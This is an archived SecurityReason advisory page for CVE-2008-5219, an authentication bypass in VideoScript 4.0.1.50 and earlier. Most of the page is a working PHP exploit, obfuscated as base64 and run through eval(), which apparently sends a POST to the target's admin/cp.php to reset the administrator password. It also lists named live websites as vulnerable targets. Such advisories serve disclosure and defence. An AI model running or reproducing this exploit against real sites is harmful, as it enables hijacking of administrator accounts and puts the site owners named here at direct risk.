SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
IT News
Search
SecurityAlert Database
About SecurityAlert
ExploitAlert Database
SecurityReason Research
WLB
WLB Database
Send to WLB
About WLB
Services
Security Audit
Schedule
Prices of services
Contact
RSS
SecurityReason IT News
SecurityAlert
World Laboratory of Bugtraq
ExploitAlert
Apache
PHP
Corporate
Contact
About SecurityReason
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com
Home arrow SecurityAlert Database

Arrow  Topic :

VideoScript <= 4.0.1.50 Admin Change Password Exploit


Arrow  SecurityAlert : 4634
Arrow  CVE : CVE-2008-5219
Arrow  CWE : CWE-287
Arrow  SecurityRisk : High  Security Risk High  (About)
Arrow  Remote Exploit : Yes
Arrow  Local Exploit : No
Arrow  Victim interaction required : No
Arrow  Exploit Available : No
Arrow  Credit : G4N0K
Arrow  Published : 26.11.2008

Arrow  Affected Software : videoscript:videoscript:4.0.1.50 and previous versions



Arrow  Advisory Content :  

<?php
/*
==========================================================================
====
_ _ _ _ _ _
/ \ | | | | / \ | | | |
/ _ \ | | | | / _ \ | |_| |
/ ___ \ | |___ | |___ / ___ \ | _ |
IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|


==========================================================================
====
____ _ _ _ _ ___ _ __
/ ___| | || | | \ | | / _ \ | |/ /
| | _ | || |_ | \| | | | | | | ' /
| |_| | |__ _| | |\ | | |_| | | . \
\____| |_| |_| \_| \___/ |_|\_\

==========================================================================
====
VideoScript <= 4.0.1.50 Admin Change Password Exploit
==========================================================================
====

[»] Script: [ VideoScript <= 4.0.1.50 ]
[»] Language: [ PHP ]
[»] Website: [ http://videoscript.co.uk/ ]
[»] Type: [ Commercial ]
[»] DOD: [ 15.11.2008 ]
[»] Founder.Coder: [ G4N0K <mail.ganok[at]gmail.com> ]


===[ XPL ]===
*/

error_reporting(E_ALL);
$G4N0K =
"JEc0TjBLID0gPDw8RU9HDQo9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT
09".
"PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0NCiAgICAgICAgICAgICA
gICAg".
"ICAgICBfICAgICAgXyAgICAgICBfICAgICAgICAgIF8gICAgICBfICAgXyANCiAgICAgICA
gICAg".
"ICAgICAgICAgIC8gXCAgICB8IHwgICAgIHwgfCAgICAgICAgLyBcICAgIHwgfCB8IHwNCiA
gICAg".
"ICAgICAgICAgICAgICAgLyBfIFwgICB8IHwgICAgIHwgfCAgICAgICAvIF8gXCAgIHwgfF9
8IHwN".
"CiAgICAgICAgICAgICAgICAgICAvIF9fXyBcICB8IHxfX18gIHwgfF9fXyAgIC8gX19fIFw
gIHwg".
"IF8gIHwNCiAgIElOIFRIRSBOQU1FIE9GIC9fLyAgIFxfXCB8X19fX198IHxfX19fX3wgL18
vICAg".
"XF9cIHxffCB8X3wNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA
gICAg".
"ICAgICAgICAgICAgICAgICANCg0KPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0
9PT09".
"PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09DQogICAgICAgICA
gICAg".
"ICAgICAgICAgX19fXyAgIF8gIF8gICAgIF8gICBfICAgIF9fXyAgICBfICBfXw0KICAgICA
gICAg".
"ICAgICAgICAgICAgLyBfX198IHwgfHwgfCAgIHwgXCB8IHwgIC8gXyBcICB8IHwvIC8NCiA
gICAg".
"ICAgICAgICAgICAgICAgfCB8ICBfICB8IHx8IHxfICB8ICBcfCB8IHwgfCB8IHwgfCAnIC8
gDQog".
"ICAgICAgICAgICAgICAgICAgIHwgfF98IHwgfF9fICAgX3wgfCB8XCAgfCB8IHxffCB8IHw
gLiBc".
"IA0KICAgICAgICAgZVhwbG8hdCBCeSAgXF9fX198ICAgIHxffCAgIHxffCBcX3wgIFxfX18
vICB8".
"X3xcX1wNCg0KPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0
9PT09".
"PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09DQoJVmlkZW9TY3JpcHQgPD0gNC4wLjE
uNTAg".
"QWRtaW4gQ2hhbmdlIFBhc3N3b3JkIEV4cGxvaXQNCj09PT09PT09PT09PT09PT09PT09PT0
9PT09".
"PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PQ0
KDQpF".
"T0c7DQplY2hvICI8cHJlPiIuJEc0TjBLLiI8L3ByZT4iOw0KJEZPUk0gPSAiPEZPUk0gYWN
0aW9u".
"PVwiIi4kX1NFUlZFUlsiUEhQX1NFTEYiXS4iXCIgbWV0aG9kPVwiUE9TVFwiPiI7JEZPUk0
uPSA8".
"PDxGRkYNCiAgICA8UCBzdHlsZT0id2lkdGg6IDMwMHB4O2NsZWFyOiBsZWZ0O21hcmdpbjo
gMDtw".
"YWRkaW5nOiA1cHggMCA4cHggMDtwYWRkaW5nLWxlZnQ6IDE1NXB4O2JvcmRlci10b3A6IDF
weCBk".
"YXNoZWQgZ3JheTsiPg0KICAgIDxMQUJFTCBzdHlsZT0iZm9udC13ZWlnaHQ6IGJvbGQ7Zmx
vYXQ6".
"IGxlZnQ7bWFyZ2luLWxlZnQ6IC0xNTVweDt3aWR0aDoxNTBweDsiIGZvcj0iTVNER05LIj4
gV2Vi".
"c2l0ZSA6Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A
7Jm5i".
"c3A7Jm5ic3A7Jm5ic3A7aHR0cDovLzwvTEFCRUw+DQogICAgICAgICAgICAgIDxJTlBVVCB
zdHls".
"ZT0id2lkdGg6IDE4MHB4OyIgdHlwZT0idGV4dCIgbmFtZT0iTVNER05LIiBpZD0iTVNER05
LIj48".
"YnIgLz4NCiAgICA8TEFCRUwgc3R5bGU9ImZvbnQtd2VpZ2h0OiBib2xkO2Zsb2F0OiBsZWZ
0O21h".
"cmdpbi1sZWZ0OiAtMTU1cHg7d2lkdGg6MTUwcHg7IiBmb3I9IlBBVEgiPlBhdGg6ICggL3N
jcmlw".
"dC8gKTwvTEFCRUw+DQogICAgICAgICAgICAgIDxJTlBVVCBzdHlsZT0id2lkdGg6IDE4MHB
4OyIg".
"dHlwZT0idGV4dCIgbmFtZT0iUEFUSCIgaWQ9IlBBVEgiIHZhbHVlPSIvIj48QlI+DQogICA
gPFAg".
"c3R5bGU9IndpZHRoOiAzMDBweDtjbGVhcjogbGVmdDttYXJnaW46IDA7cGFkZGluZzogNXB
4IDAg".
"OHB4IDA7cGFkZGluZy1sZWZ0OiAxNTVweDtib3JkZXItdG9wOiAxcHggZGFzaGVkIGdyYXk
7Ij4N".
"Cgk8TEFCRUwgc3R5bGU9ImZvbnQtd2VpZ2h0OiBib2xkO2Zsb2F0OiBsZWZ0O21hcmdpbi1
sZWZ0".
"OiAtMTU1cHg7d2lkdGg6MTUwcHg7IiBmb3I9Im5wdyI+IE5ldyBQYXNzd29yZCA6IDwvTEF
CRUw+".
"DQogICAgICAgICAgICAgIDxJTlBVVCBzdHlsZT0id2lkdGg6IDE4MHB4OyIgdHlwZT0idGV
4dCIg".
"bmFtZT0ibnB3IiBpZD0ibnB3Ij48QlI+DQoJPFAgc3R5bGU9IndpZHRoOiAzMDBweDtjbGV
hcjog".
"bGVmdDttYXJnaW46IDA7cGFkZGluZzogNXB4IDAgOHB4IDA7cGFkZGluZy1sZWZ0OiAxNTV
weDti".
"b3JkZXItdG9wOiAxcHggZGFzaGVkIGdyYXk7Ij4NCiAgICA8SU5QVVQgdHlwZT0ic3VibWl
0IiBu".
"YW1lPSJzdWJtaXQiIHZhbHVlPSJDaGFuZ2UgaXQhIj4gPElOUFVUIHR5cGU9InJlc2V0Ij4
NCiAg".
"ICA8L1A+DQogPC9GT1JNPg0KRkZGOw0KaWYgKGlzc2V0KCRfUE9TVFsnc3VibWl0J10pICY
mIGlz".
"c2V0KCRfUE9TVFsiTVNER05LIl0pICYmICFlbXB0eSgkX1BPU1RbIk1TREdOSyJdKSAmJiB
pc3Nl".
"dCgkX1BPU1RbJ25wdyddKSAmJiAhZW1wdHkoJF9QT1NUWyducHcnXSkgJiYgaXNzZXQoJF9
QT1NU".
"WyJQQVRIIl0pICYmICFlbXB0eSgkX1BPU1RbIlBBVEgiXSkpIHskbmV3X3B3ZCA9ICRfUE9
TVFsn".
"bnB3J107JHRlaGRhZGVfY2hhcnogPSBzdHJsZW4odXJsZW5jb2RlKCRuZXdfcHdkKSkgKiA
yICsg".
"Mjg7JGpva2U9IlBPU1QgIi4kX1BPU1RbIlBBVEgiXS4iYWRtaW4vY3AucGhwIEhUVFAvMS4
xXHJc".
"bkhvc3Q6ICIuJF9QT1NUWyJNU0RHTksiXS4iXHJcblVzZXItQWdlbnQ6IE1vemlsbGEvNS4
wIChX".
"aW5kb3dzOyBVOyBXaW5kb3dzIE5UIDUuMTsgZW4tVVM7IHJ2OjEuOSkgR2Vja28vMjAwODA
1Mjkw".
"NiBGaXJlZm94LzMuMFxyXG5LZWVwLUFsaXZlOiAzMDBcclxuQ29ubmVjdGlvbjoga2VlcC1
hbGl2".
"ZVxyXG5Db250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZFx
yXG5D".
"b250ZW50LUxlbmd0aDogIi4kdGVoZGFkZV9jaGFyei4iXHJcblxyXG5ucGFzcz0iLiRuZXd
fcHdk".
"LiImbnBhc3MxPSIuJG5ld19wd2QuIiZTdWJtaXQ9U3VibWl0XHJcbiI7JHJlcz0iIjskYXR
0YWNr".
"ID0gZnNvY2tvcGVuKCRfUE9TVFsiTVNER05LIl0sIjgwIiwkZXJybm8sICRlcnJzdHIsIDU
wKTtp".
"ZighJGF0dGFjayl7ZWNobygiPGJyIC8+V1RGLCBlcnIjOiAoJGVycm5vKS4kZXJyc3RyIik
7cmV0".
"dXJuO31lY2hvKCI8c3BhbiBzdHlsZT1cImZvbnQ6bm9ybWFsIDhwdCB0YWhvbWE7XCI+Jm5
ic3A7".
"Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7WytdIDxiPkNvbm5lY3RlZC4uLjxici8+PC9iPiZ
uYnNw".
"OyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwO1srXSA8Yj5TZW5kaW5nIHJlcXVlc3QuLi48YnI
vPjwv".
"Yj4iKTtmd3JpdGUoJGF0dGFjaywkam9rZSk7d2hpbGUoIWZlb2YoJGF0dGFjaykpeyRyZXM
uPWZn".
"ZXRzKCRhdHRhY2spO31mY2xvc2UoJGF0dGFjayk7aWYgKHN0cmlzdHIoJHJlcywgInNhdmV
kIikg".
"fHwgc3RyaXN0cigkcmVzLCAiY2hhbmdlZCIpKXtlY2hvICImbmJzcDsmbmJzcDsmbmJzcDs
mbmJz".
"cDsmbmJzcDtbK108Yj4gRXhwbG9pdGVkICEgLCA8Zm9udCBjb2xvcj1cInJlZFwiPlBhc3N
3b3Jk".
"IGNoYW5nZWQuLi48L2I+PC9mb250PjxiciAvPiZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZ
uYnNw".
"O1srXSAuLi48YnIgLz4mbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDtbK10gPGI+bmV
3IHBh".
"c3N3b3JkOjwvYj4gIi4kbmV3X3B3ZC4iPGJyIC8+Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A
7Jm5i".
"c3A7WytdPGI+IGFkbWluIHBhbmVsOjwvYj4gaHR0cDovLyIuJF9QT1NUWyJNU0RHTksiXS4
kX1BP".
"U1RbIlBBVEgiXS4iYWRtaW4vPGJyIC8+PGJyIC8+PGJyIC8+PGJyIC8+PGJyIC8+PGJyIC8
+PGJy".
"IC8+PHNwYW4gc3R5bGU9XCJmb250Om5vcm1hbCA4cHQgdGFob21hO2NvbG9yOiNDQ0M7XCI
+RXhw".
"bG9pdCBCeSBHNE4wSy4uLjwvc3Bhbj4iO30gZWxzZSB7IGVjaG8gIiZuYnNwOyZuYnNwOyZ
uYnNw".
"OyZuYnNwOyZuYnNwO1srXTxiPiBPb3BzICwgIHNyeSAsICA8dT5ub3QgVnVsbmVyYWJsZTw
vdT4g".
"LiAuIC4gITwvYj4iO31mbHVzaCgpO31lbHNle2VjaG8kRk9STTt9DQo=";
eval(base64_decode($G4N0K));

/* ===[ LIVE ]===

[»] www.xxxuploads.co.uk
[»] www.gayphp.com
[»] ...


===[ Greetz ]===

[»] ALLAH
[»] Tornado2800 <Tornado2800[at]gmail.com> // bedone in nemishe :D
[»] Hussain-X <darkangel_g85[at]yahoo.com> // Jazakallah...
[»] Str0ke //Hey Brotha keep rocking on ;)
[»] Soudi-L0rd,Sakab...
[»] SMN,MSD-KiD,AMD,MSN...

Are ya looking for something that has not BUGz at all...!? I know it...
It's The Holy Quran. [:-)
ALLAH,forgimme...
*/
?>



Arrow  References :

http://securityreason.com/expldownload/1/5144/1 (Exploit)
http://www.milw0rm.com/exploits/7149
http://secunia.com/advisories/32718
http://osvdb.org/49885




Arrow  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

libc:fts_*() Multiple Denial of Service

Security Risk Medium- 2009-10-02

The fts functions are provided for traversing UNIX file hierarchies...
Apache RSS Apache Alert

» Apache 1.3.41 mod_proxy
   Integer overflow (code
   execution)

» Apache Tomcat 6.0.20 and
   5.5.28 unexpected file
   deletion in work
   directory

» Apache Tomcat 6.0.20 and
   5.5.28 insecure partial
   deploy after failed
   undeploy

» Apache Tomcat 6.0.20 and
   5.5.28 unexpected file
   deletion and/or
   alteration
PHP RSS PHP Alert

» PHP 5.2.12/5.3.1 Multiple
   Vulnerabilities

» PHP 5.2.11 libgd multiple
   vulnerabilities

» PHP 5.2.11 tempnam()
   safe_mode bypass

» PHP 5.3.0 5.2.11
   posix_mkfifo()
   open_basedir bypass
Copyright © SecurityReason.com. All Rights Reserved.